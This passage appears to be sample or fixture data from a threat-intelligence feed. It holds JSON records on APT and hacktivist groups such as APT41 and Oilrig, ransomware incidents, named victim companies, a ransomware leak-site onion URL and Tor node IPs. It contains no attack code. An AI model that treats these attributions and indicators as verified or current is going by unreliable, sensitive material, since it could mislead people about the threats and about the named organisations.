", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "red", + "tlp": "red", + "ttl": null + }, + "expertise": [ + "AutoReport" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": true, + "id": "4ffc68d1fd5cd6a2084c8284256be7651aafa84b", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [ + { + "attributes": null, + "dateFirstSeen": "2024-09-24", + "dateLastSeen": "2024-09-24", + "description": null, + "id": "0a3f9339b944b7976bbbccf6a695592ce97b7523", + "langs": [ + "ru" + ], + "malwareIdList": null, + "malwareList": [], + "params": { + "domain": "wehermes.com", + "ipv4": [], + "ipv6": [], + "ssl": [], + "url": "" + }, + "seqUpdate": 17271570168080, + "sources": [ + "panda_playbook" + ], + "techSeqUpdate": null, + "title": null, + "type": "network" + } + ], + "indicatorsIds": [ + "0a3f9339b944b7976bbbccf6a695592ce97b7523" + ], + "isAutogen": true, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0850", + "sectors": [], + "seqUpdate": 17272224279604, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "IR", + "id": "ea7951d222a76335539dfe8774fd24dba6770139", + "isAPT": true, + "name": "Oilrig" + }, + "title": "Oilrig - New indicators have been found", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-25T03:00:27+03:00" + } + ], + "seqUpdate": 17272224279604 + }, + "apt/threat_actor":{ + "count": 19, + "items": [ + { + "addedToThreatLandscapeFor": null, + "aliases": [ + "CamoFei" + ], + "country": "CN", + "createdAt": "2019-02-20T17:44:21+00:00", + "description": "

Experts gave the group the name ChamelGang (from the word 'chameleon'), because the group disguised its malware and network infrastructure under legitimate services of Microsoft, TrendMicro, McAfee, IBM, and Google. The attackers employed two methods. They acquired domains that imitate legitimate ones. In addition, the APT group placed SSL certificates that also imitated legitimate ones on its servers. To achieve their goal, the attackers used a trending penetration method—supply chain. The group compromised a subsidiary and penetrated the target company's network through it.

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [ + { + "hash": "23f780c4ad6cdc16989acdb4f218712ba1d2d038e9c057026e54249b031957a3", + "mime": "image/png", + "name": "23f780c4ad6cdc16989acdb4f218712ba1d2d038e9c057026e54249b031957a3", + "size": 60084 + } + ], + "goals": [], + "hasIocs": true, + "id": "de70f8194526173b885baf2999f65225927c2f31", + "isAPT": true, + "labels": [], + "langs": [ + "en", + "ru" + ], + "name": "ChamelGang", + "oldId": null, + "roles": [], + "seqUpdate": 17274816349479, + "spokenOnLangs": [ + "en" + ], + "stat": { + "allIndicatorsCount": 51, + "allReportsCount": 6, + "contactsCount": 4, + "countries": [ + "BR", + "IN", + "JP", + "RU", + "TW", + "US" + ], + "cve": [], + "dateFirstSeen": "2022-11-01", + "dateLastSeen": "2024-09-28", + "expertise": [ + "AutoReport", + "Brief Report", + "Ransomware" + ], + "forumsAccountsCount": 0, + "malware": [ + "CatB", + "Cobalt Strike" + ], + "regions": [ + "america:northern_america", + "america:south_america", + "asia", + "europe" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-28", + "id": "9c8d61663f8e4b2c58d9029238ac9b2e6d65793d", + "name": { + + "en": "ChamelGang - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-07", + "id": "fbb2d470aa4530fb2260b14346c4d62353463e29", + "name": { + + "en": "ChamelGang - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-07", + "id": "f8624dcf70b33a45e027e7fa68cc9d2ee3120092", + "name": { + + "en": "ChamelGang - New indicators have been found" + } + } + ], + "sectors": [ + "government-and-military", + "health-care" + ], + "targetedCompany": [], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-28T03:00:34+03:00" + }, + { + "addedToThreatLandscapeFor": null, + "aliases": [ + "BARIUM", + "Winnti", + "LEAD", + "WICKED SPIDER", + "WICKED PANDA", + "Blackfly", + "Suckfly", + "Winnti Umbrella", + "Double Dragon", + "HOODOO", + "RedGolf" + ], + "country": "CN", + "createdAt": "2020-05-20T16:23:32+03:00", + "description": "

A China-sponsored criminal group with dual attack goal (cyber espionage and financial benefit) that has been active since at least 2007. 

Area of interest

APT41 specializes in stealing digital certificates for use in operations involving user data theft (cyber espionage), as well as placing cryptominers and ransomware on devices. Previously, the group's goals were also currency manipulation in online games and theft of intellectual property.

Alternative names

The network penetration operations are called WICKEDPANDA, while those related to financial gain are called WICKED SPIDER. In the Microsoft classification, attacks on the video game and technology industry are usually called BARIUM, and cyber espionage operations are called LEAD.

C2 servers special character

The second-level domains consonant with the name of the legitimate company were used with no routed localhost IP-address in the A-record when inactive. After that, a third-level domain was created, which resolved to the IP address of the attackers' server. At the same time, the address of the legitimate site of the company was used for the second-level domain, as the attackers were mimicking.

General tools characteristics

The malware was distributed in the DLL library for a 64-bit version of Windows form and had the functionality of a Remote Administration Tool (RAT). Third-party utilities and frameworks were also used. The use of malware attributed to other groups has been noticed.

Samples feature 

The use of digital certificates issued for legitimate gaming software and obtained by compromising the manufacturer in attacks is one of the main features of this group. In addition, there is information about the use (including re-use) of such certificates in attacks by other Chinese cyber groups (APT17, APT20, APT31). Certificates are either delivered by agreement with the group, or distributed commercially in the shadow segment of the network.

Collaboration

APT41 considered to be a few chinese APT groups conglomerate which includes Group 72, PassCV, APT17.

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [], + "goals": [ + "Information", + "Research", + "Financial" + ], + "hasIocs": true, + "id": "59a1326f2bed234dcb864a69e7ab28b2fa4b14e9", + "isAPT": true, + "labels": [ + "hacker", + "spy", + "nation-state" + ], + "langs": [ + "ru", + "en" + ], + "name": "APT41", + "oldId": null, + "roles": [ + "malware-author", + "infrastructure-architect", + "infrastructure-operator" + ], + "seqUpdate": 17275680181282, + "spokenOnLangs": [ + "zh" + ], + "stat": { + "allIndicatorsCount": 3188, + "allReportsCount": 129, + "contactsCount": 143, + "countries": [ + "TW", + "KR", + "US", + "JP", + "IN", + "VN", + "PH", + "CN", + "HK", + "GB", + "MY", + "SG", + "TH", + "RU", + "CA", + "DE", + "AU", + "IT", + "FR", + "ID", + "SA", + "AE", + "BR", + "CH", + "DK", + "FI", + "MX", + "PK", + "PL", + "QA", + "SE", + "UA", + "KG", + "KZ", + "MM", + "NP", + "AF", + "AR", + "BE", + "BH", + "BY", + "CL", + "CZ", + "ES", + "FJ", + "IL", + "KW", + "LK", + "MO", + "NL", + "PE", + "SK", + "TJ", + "UZ" + ], + "cve": [ + "CVE-2017-0199", + "CVE-2013-0633", + "CVE-2013-0634", + "CVE-2017-11882", + "CVE-2018-5713", + "CVE-2019-11510", + "CVE-2019-16278", + "CVE-2019-1652", + "CVE-2019-1653", + "CVE-2019-16920", + "CVE-2019-18935", + "CVE-2019-19781", + "CVE-2019-3396", + "CVE-2019-9621", + "CVE-2019-9670", + "CVE-2020-10189", + "CVE-2021-1675", + "CVE-2021-22205", + "CVE-2021-26855", + "CVE-2021-26857", + "CVE-2021-26858", + "CVE-2021-27065", + "CVE-2021-31207", + "CVE-2021-34473", + "CVE-2021-34481", + "CVE-2021-34523", + "CVE-2021-34527", + "CVE-2021-36958", + "CVE-2021-44207", + "CVE-2021-44228", + "CVE-2022-24682", + "CVE-2022-27924", + "CVE-2022-27925", + "CVE-2022-30333", + "CVE-2022-37042", + "CVE-2022-39952", + "CVE-2022-40684" + ], + "dateFirstSeen": "2009-11-27", + "dateLastSeen": "2024-09-29", + "expertise": [ + "AutoReport", + "Backdoor", + "Cobalt Strike", + "Windows", + "Active Directory", + "Exploit", + "Access", + "Rootkit", + "Stealer", + "x64", + "Compromised data", + "Metasploit", + "CVE", + "Fileless", + "Loader", + "Shell", + "Unix", + "Android", + "Brief Report", + "Corporate network", + "Keylogger", + "RAT", + "Ransomware", + "Replacer", + "Web-inject" + ], + "forumsAccountsCount": 0, + "malware": [ + "Cobalt Strike", + "Winnti", + "ShadowPad", + "PlugX", + "Mimikatz", + "Crosswalk", + "FunnySwitch", + "KEYPLUG", + "Metasploit", + "PHOTO", + "SQLMap", + "9002 RAT", + "China Chopper", + "Cobalt Strike Beacon", + "PWNLNX", + "Pipemon", + "PortReuse", + "Spyder", + "WINNKIT", + "AceHash", + "Bisonal", + "Brute Ratel", + "CRACKSHOT", + "ColdLock", + "DBoxAgent", + "DEPLOYLOG", + "Gh0st", + "HDRoot", + "MESSAGETAP", + "Microcin", + "MoonBounce", + "PRIVATELOG", + "PWNDROID4", + "Poison Ivy", + "PowerSploit", + "RedXOR", + "SPARKLOG", + "STASHLOG", + "ShadowHammer", + "SideWalk", + "SkinnyD", + "Speculoos", + "XMRig", + "ZxShell", + "nmap", + "skip-2.0", + "xDll" + ], + "regions": [ + "asia", + "america:northern_america", + "europe", + "europe:european_union", + "oceania", + "middle_east", + "america:south_america", + "america:central_america" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-29", + "id": "5335d2f653b14eabfcd810e4d57e852668623213", + "name": { + + "en": "APT41 - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-24", + "id": "d1da0a53543a18e5240ece12d031b6ad711a8202", + "name": { + + "en": "APT41 - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-22", + "id": "b4a95fd5b5dd43181865220fc8eb0fba9aba5bfc", + "name": { + + "en": "APT41 - New indicators have been found" + } + } + ], + "sectors": [ + "gaming:online-games", + "hardware:telecommunications", + "government-and-military", + "information-technology:information-technology", + "energy:energy", + "government-and-military:government", + "manufacturing:manufacturing", + "other:universities", + "content-and-publishing:news", + "health-care:health-care", + "real-estate:construction", + "software:software", + "transportation:air-transportation", + "manufacturing", + "other:non-profit", + "transportation:transportation", + "education:education", + "financial-services:consumer-lending", + "financial-services:credit", + "gaming:console-games", + "gaming:video-games", + "government-and-military:military", + "professional-services:legal", + "real-estate:real-estate", + "science-and-engineering:aerospace", + "travel-and-tourism:tourism", + "travel-and-tourism:travel", + "financial-services", + "financial-services:financial-services", + "government-and-military:national-security", + "health-care", + "health-care:pharmaceutical", + "transportation:logistics", + "travel-and-tourism:hospitality", + "advertising:social-media-advertising", + "commerce-and-shopping:retail", + "commerce-and-shopping:retail-technology", + "consumer-electronics:computer", + "consumer-electronics:consumer-electronics", + "education", + "financial-services:accounting", + "financial-services:health-insurance", + "financial-services:insurance", + "information-technology", + "media-and-entertainment", + "other:consumer", + "other:infrastructure", + "other:small-and-medium-businesses", + "real-estate:building-maintenance", + "real-estate:property-development", + "sales-and-marketing:digital-marketing", + "science-and-engineering:chemical", + "software", + "transportation", + "transportation:shipping", + "travel-and-tourism:hotel" + ], + "targetedCompany": [ + "Air India", + "Apptricity Corporation", + "Changhua Christian Hospital", + "Delta Electronics", + "EC Pay", + "ESTsoft Corp", + "HO CHI MINH NATIONAL POLITICAL ACADEMY", + "Juphoon System Software", + "Mandarin Daily News", + "NCsoft", + "NEXON Corporation", + "NHN Corporation", + "National Development Fund of Taiwan", + "Neowiz CORPORATION", + "Prospera Hotels", + "Royal Thai Air Force", + "Royal Thai Navy", + "TVBS Media", + "YD Online Corp.", + "Arktos Entertainment Group", + "Asiasoft Corporation", + "AsusTek Computer Inc.", + "BASF", + "Battlestate Games", + "CPC Corp.", + "Cayenne Entertainment Technology Co.,Ltd", + "Cebu Technological University", + "Chienkuo Technology University", + "Chunnam Techno University", + "Covestro", + "EPiServer AB", + "EYA soft", + "Electronics Extreme Limited", + "Electronics Extreme Ltd.", + "En Masse Entertainment", + "Fantasy Technology Corp", + "Fortuna Games Co", + "Fortuna Games Co.", + "Fuqing Dawu Technology", + "Fuqing Dawu Technology Co", + "GameUS Inc", + "Garena Online Pte Ltd", + "Garena Online Pvt Ltd", + "Garena online", + "Global Commercial Technology Co.,LTD.", + "Global Commercial Technology Co.,LTD. ", + "Gravity Co., Ltd", + "Guangzhou YuanLuo Technology Co", + "Guangzhou YuanLuo Technology Co.", + "Hammerpoint Interactive", + "Hangame", + "Hangame Japan", + "Henkel", + "Hong Kong Shue Yan University", + "Internap Corporation", + "Kog Co., Ltd.", + "Konkuk University", + "LANXESS", + "Lingnan University", + "Lion Air", + "LivePlex Corp", + "MGAME Corp", + "MGAME Corp.", + "Marriott", + "NOX Entertainment", + "NOX Entertainment Co., Ltd", + "NTC Technology Ltd", + "Nanjing Ranyi Technology Co.", + "Nanjing Ranyi Technology Co., Ltd.", + "Neoact Co", + "NetSarang Computer, Inc.", + "OP Productions, LLC", + "Redduck Inc.", + "Roche", + "Rosso Index KK", + "Royal Thai Armed Forces", + "Runewaker Entertainment", + "SK Broadband Co Ltd", + "Schroders", + "Sesisoft", + "Shanda Games", + "Shin-Etsu", + "Sichuan Qiyu Network Technology", + "Sichuan Qiyu Network Technology Co., Ltd.", + "Siemens", + "Sumitomo", + "THANH TRA CHÍNH PHỦ", + "TeamViewer", + "Trion Worlds", + "VNG Corporation", + "Valve", + "WEBZEN", + "WVT (HK) COMPANY LIMITED", + "Webzen Inc.", + "Wemade Entertainment", + "Wemade Entertainment co.", + "XL Games", + "XL Games Co", + "XL Games Co.,Ltd", + "YNK Japan", + "ZEALOT DIGITAL INTERNATIONAL CORPORATION", + "Zemi Interactive Co", + "Zemi Interactive Inc.", + "Zepetto", + "ZerodinGames Co., Ltd", + "eDong" + ], + "targetedPartnersAndClients": [ + "Piriform Ltd." + ] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-29T03:00:18+03:00" + }, + { + "addedToThreatLandscapeFor": null, + "aliases": [], + "country": null, + "createdAt": "2019-02-20T17:44:21+00:00", + "description": "

BAHAMUT is the name given to a cyberespionage threat actor by researchers writing for Bellingcat in 2017. 

The APT group BAHAMUT is behind a \"staggering\" number of ongoing malicious campaigns against government members and senior business leaders in the Middle East and South Asia. The members of BAHAMUT are allegedly mercenaries who provide services to those who offer the best price. The Bahamut group mainly uses phishing websites, fake news websites, and social networking sites to attack.

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [], + "goals": [], + "hasIocs": true, + "id": "abbce934395e21f6669e99f9caf6d741ef8ea7d0", + "isAPT": true, + "labels": [], + "langs": [ + "en", + "ru" + ], + "name": "Bahamut", + "oldId": null, + "roles": [], + "seqUpdate": 17277408454364, + "spokenOnLangs": [], + "stat": { + "allIndicatorsCount": 63, + "allReportsCount": 35, + "contactsCount": 0, + "countries": [ + "IN", + "PK", + "SA" + ], + "cve": [], + "dateFirstSeen": "2022-01-06", + "dateLastSeen": "2024-09-30", + "expertise": [ + "AutoReport", + "Brief Report" + ], + "forumsAccountsCount": 0, + "malware": [], + "regions": [ + "asia", + "middle_east" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-10-01", + "id": "bb57c20ac0e9c2fdea65676abb90b243b6e2eb9b", + "name": { + + "en": "Bahamut - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-28", + "id": "aac4f317e4bf9cdf4162b5650fc784dd78a0efb9", + "name": { + + "en": "Bahamut - New indicators have been found" + } + }, + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "8dd54f04fbac850457a9b9a1e2cb409d4ea309e6", + "name": { + + "en": "Bahamut - New indicators have been found" + } + } + ], + "sectors": [ + "government-and-military" + ], + "targetedCompany": [], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-10-01T03:00:45+03:00" + } + ], + "seqUpdate": 17277408454364 + }, + "hi/threat_actor":{ + "count": 152, + "items": [ + { + "addedToThreatLandscapeFor": null, + "aliases": [], + "country": "KH", + "createdAt": "2023-07-07T02:24:07+00:00", + "description": "

 

The group started its activity at the end of spring 2023.


Among the targets, the group clearly prioritizes Indonesia and Thailand. However, like most hacktivist groups, they also attack states associated with any high-profile newsworthy events.

In contrast to most similar NDT groupings, NEC pays a lot of attention to attacks that lead to leaks or obtaining and subsequent publication of access to any admin panel. Presumably, the group uses SQLmap as the main tool for such attacks.
The group refers to the region of Cambodia and, predominately, to the Khmers. Telegram channel (@ndtgroup_kh) uses English and sometimes Khmer.

 

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [], + "goals": [], + "hasIocs": false, + "id": "af636987c56e51f88cde01da2a2f01c304e21677", + "isAPT": false, + "labels": [], + "langs": [ + "en" + ], + "name": "NDT SEC", + "oldId": null, + "roles": [], + "seqUpdate": 17271118627713, + "spokenOnLangs": [ + "en" + ], + "stat": { + "allIndicatorsCount": 0, + "allReportsCount": 27, + "contactsCount": 21, + "countries": [ + "TH", + "ID", + "FR", + "NZ", + "VN" + ], + "cve": [], + "dateFirstSeen": "2023-05-13", + "dateLastSeen": "2024-09-23", + "expertise": [ + "DDOS", + "Hacktivism", + "Hactivism", + "AutoReport", + "Leak", + "Deface", + "Hacktivist", + "mea_tension" + ], + "forumsAccountsCount": 0, + "malware": [], + "regions": [ + "asia", + "europe:european_union", + "oceania" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "d32e021fe8fb389ecb5947b9a644ca05185f0e7e", + "name": { + + "en": "NDT SEC posted message containing data about possible attack targeting Indonesia" + } + }, + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "f4626c8b0e3e8f0f0cf1ba30fa3cea5256bf0997", + "name": { + + "en": "NDT SEC posted message containing data about possible attack targeting Indonesia" + } + }, + { + "companyId": [], + "datePublished": "2024-09-23", + "id": "5f255b8924ffd41487ebac0e0a8d0aa4e445a13f", + "name": { + + "en": "NDT SEC posted message containing data about possible attack targeting bali-airport.com" + } + } + ], + "sectors": [ + "government-and-military", + "government-and-military:government", + "commerce-and-shopping:retail", + "education", + "energy:electrical-distribution", + "financial-services", + "financial-services:banking" + ], + "targetedCompany": [], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-23T20:17:42+03:00" + }, + { + "addedToThreatLandscapeFor": null, + "aliases": [ + "grep", + "grepcn", + "grepmoj" + ], + "country": null, + "createdAt": "2024-08-29T17:09:34+05:00", + "description": "

The user with the alias grep has been active on the underground forum breachforums[.]st since July 3, 2024.

Link to user's profile: 

hxxps://breachforums[.]st/User-grep

The threat actor's main activity is data and access leakage

 grep has the same signature as two others threat actors: IntelBroker and EnergyWeaponUser

The actor with the alias grepmoj also joined XSS on September 9, 2024. Link to the profile: hxxps://xss[.]is/members/382722/

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "files": [ + { + "hash": "d8e3c27ddd39d7cbb9e5adfa037ee4df26f91e0a7d8f7d2f21e34281e29fe31c", + "mime": "image/png", + "name": "d8e3c27ddd39d7cbb9e5adfa037ee4df26f91e0a7d8f7d2f21e34281e29fe31c", + "size": 490571 + }, + { + "hash": "47c23bca8feec188cc4d969de751037c57312cf4b7f96769b77e7b021610576b", + "mime": "image/png", + "name": "47c23bca8feec188cc4d969de751037c57312cf4b7f96769b77e7b021610576b", + "size": 156035 + }, + { + "hash": "866f3e0549e6dbae926c59e87e8d9506a878820e283f7f32f1b81f4d5f166a43", + "mime": "image/png", + "name": "866f3e0549e6dbae926c59e87e8d9506a878820e283f7f32f1b81f4d5f166a43", + "size": 84798 + }, + { + "hash": "46fd1f61dbb3fee5e478c506dcf91713605ad0ad36313df8ce6ef2c6c3c3f022", + "mime": "image/png", + "name": "46fd1f61dbb3fee5e478c506dcf91713605ad0ad36313df8ce6ef2c6c3c3f022", + "size": 40110 + } + ], + "goals": [], + "hasIocs": false, + "id": "6f99ebe40786111b7cceba8dccba662029d1e094", + "isAPT": false, + "labels": [], + "langs": [ + "en" + ], + "name": "grep", + "oldId": null, + "roles": [], + "seqUpdate": 17271683148763, + "spokenOnLangs": [], + "stat": { + "allIndicatorsCount": 0, + "allReportsCount": 3, + "contactsCount": 0, + "countries": [ + "EG", + "FR", + "ID", + "IN" + ], + "cve": [], + "dateFirstSeen": "2024-08-29", + "dateLastSeen": "2024-09-23", + "expertise": [ + "Compromised data", + "Leak", + "Database" + ], + "forumsAccountsCount": 3, + "malware": [], + "regions": [ + "asia", + "africa:northern_africa", + "europe:european_union" + ], + "relatedThreatActorsCount": 0, + "reports": [ + { + "companyId": [], + "datePublished": "2024-09-24", + "id": "2f580853070b70a12820e9b5e03f2e3823f5b318", + "name": { + "en": "Publication of data allegedly related to Indonesia's Ministry of Education, Culture, Research, and Technology" + } + }, + { + "companyId": [], + "datePublished": "2024-09-11", + "id": "07793f6779060b7df96ab0960c0b05ad6b9f94a0", + "name": { + "en": "Publication of Capgemini data" + } + }, + { + "companyId": [], + "datePublished": "2024-08-30", + "id": "99e0dafd7b780acd0d8366df2bab0660a8c623e4", + "name": { + "en": "Sale of database allegedly belonging to MedicaMall" + } + } + ], + "sectors": [ + "commerce-and-shopping:e-commerce", + "education", + "health-care:medical-device", + "information-technology", + "manufacturing:industrial", + "professional-services:consulting" + ], + "targetedCompany": [ + "Capgemini", + "Ministry of Education, Culture, Research, and Technology (Indonesia)" + ], + "targetedPartnersAndClients": [] + }, + "techSeqUpdate": null, + "threatLandscapeOptions": [ + { + "label": "company", + "value": "company" + }, + { + "label": "partner", + "value": "partner" + }, + { + "label": "industry", + "value": "industry" + }, + { + "label": "other", + "value": "other" + } + ], + "updatedAt": "2024-09-24T11:58:34+03:00" + } + ], + "seqUpdate": 17271683148763 + }, + "hi/threat":{ + "count": 1355, + "items": [ + { + "contacts": [], + "countries": [ + "CA" + ], + "createdAt": "2024-09-23T06:16:41+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

2024-09-23 Qilin ransomware attacked Canstar Restorations canstarrestorations[.]com.

Screenshot from Qilin DLS

At present data wasn't posted on a Data Leak Site (DLS). ", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "A1", + "credibility": 100, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "Leak", + "Ransomware", + "AutoReport" + ], + "files": [ + { + "hash": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "mime": "image/png", + "name": "9f432b3fd71ed9e40ca5e35cb7630d7dd3499245edcee601915011ad0a356ab7", + "size": 2895505 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "d4a164b9caecc0d28041bb042bfad1acfb91f77a", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [ + { + "attackPatternId": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "attackTactic": "impact", + "attackType": "enterprise_tactics", + "id": null, + "mitreId": "T1486", + "params": null + } + ], + "oldId": null, + "regions": [ + "america:northern_america" + ], + "relatedThreatActors": [], + "reportNumber": "CP-2809-0616", + "sectors": [ + "real-estate:construction" + ], + "seqUpdate": 17270614084038, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [ + "http://kbsqoivihgdmwczmxkbovk7ss2dcynitwhhfu5yw725dboqo5kthfaad.onion/site/view?uuid=f73f99c9-0a5d-36ff-8fab-36e936caab39" + ], + "targetedCompany": [ + "Canstar Restorations" + ], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "18c14c0707e5cdaeb7975576fa54a4346d154619", + "isAPT": false, + "name": "Qilin" + }, + "title": "Qilin Ransomware attack on Canstar Restorations", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T06:16:48+03:00" + }, + { + "contacts": [ + { + "account": "sillycatsfr", + "flag": "fake", + "service": "telegram", + "type": "im" + }, + { + "account": "ftpcat", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T11:45:16+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-15", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

Pryx created a Telegram channel on 2024-09-15 named “The daily PRYX”:

 

", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "green", + "tlp": "green", + "ttl": null + }, + "expertise": [], + "files": [ + { + "hash": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "mime": "image/png", + "name": "2cd0d8754286f5482adfa66518aa001daef66d0978a1ca7a7793a6ef9a857eef", + "size": 377290 + } + ], + "forumsAccounts": [], + "hasIocs": false, + "id": "4b6fd64b149127836d5ad524debf44917befc231", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1145", + "sectors": [], + "seqUpdate": 17270815547585, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": null, + "id": "3b4ad4eaa284c3a8a4965e71be53959fae00c98a", + "isAPT": false, + "name": "Pryx" + }, + "title": "General information - new contacts", + "toolList": [], + "type": "event", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T11:52:34+03:00" + }, + { + "contacts": [ + { + "account": "@examlpe", + "flag": "fake", + "service": "telegram", + "type": "im" + } + ], + "countries": [], + "createdAt": "2024-09-23T13:04:25+03:00", + "cveList": [], + "dateFirstSeen": "2024-09-23", + "dateLastSeen": "2024-09-23", + "datePublished": "2024-09-23", + "description": "

On 2024-09-23 in their Telegram channel (hxxps://t[.]me/ServerKillers) Server Killers posted message containing information about possible attack

We hacked South Korean Cameras!\n\nMost of the cameras are located in Seoul, Incheon, Daejeon, Suwon\n\nWe hacked:\n   Cafe Cameras \n   Restaurant Cameras \n   Home Cameras \n   Computer Room Cameras\n   Car Parking Cameras\n   Street Cameras\n   Office Cameras\n   Supermarket Cameras\n\nWe have hacked 100+ South Korean Cameras
\n", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiraltyCode": "C3", + "credibility": 60, + "reliability": 60, + "severity": "orange", + "tlp": "amber", + "ttl": null + }, + "expertise": [ + "AutoReport", + "Deface" + ], + "files": [], + "forumsAccounts": [], + "hasIocs": false, + "id": "13aad85a2c8eccce7217be1e16e39486c987bf17", + "indicatorMalwareRelationships": [], + "indicatorRelationships": [], + "indicatorToolRelationships": [], + "indicators": [], + "indicatorsIds": [], + "isAutogen": false, + "isPublished": true, + "isTailored": false, + "labels": [], + "langs": [ + "en", + "ru" + ], + "malwareList": [], + "mitreMatrix": [], + "oldId": null, + "regions": [], + "relatedThreatActors": [], + "reportNumber": "CP-2809-1304", + "sectors": [], + "seqUpdate": 17270858675384, + "shortDescription": null, + "shortTitle": null, + "sourceList": [], + "sources": [], + "targetedCompany": [], + "targetedPartnersAndClients": [], + "techSeqUpdate": null, + "threatActor": { + "country": "RU", + "id": "8d22ccb2f4aace36992ce5ec9cf431c138536820", + "isAPT": false, + "name": "Server Killers" + }, + "title": "Server Killers posted message containing data about possible attack", + "toolList": [], + "type": "threat", + "unreliableIndicators": [], + "unreliableIndicatorsRelations": [], + "updatedAt": "2024-09-23T13:04:27+03:00" + } + ], + "seqUpdate": 17270858675384 + }, + "suspicious_ip/tor_node":{ + "count": 252997, + "items": [ + { + "bind": null, + "dateFirstSeen": "2023-03-15T12:03:39+00:00", + "dateLastSeen": "2023-03-15T12:03:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 90, + "severity": "green", + "tlp": "green", + "ttl": 30 + }, + "id": "156.146.57.182", + "ipv4": { + "asn": null, + "city": null, + "countryCode": null, + "countryName": null, + "ip": "156.146.57.182", + "provider": null, + "region": null + }, + "nodes": [], + "portalLink": null, + "seqUpdate": 1682360252525000, + "source": "check.torproject.org" + }, + { + "bind": null, + "dateFirstSeen": "2023-03-22T06:07:10+00:00", + "dateLastSeen": "2023-03-22T06:07:10+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 90, + "reliability": 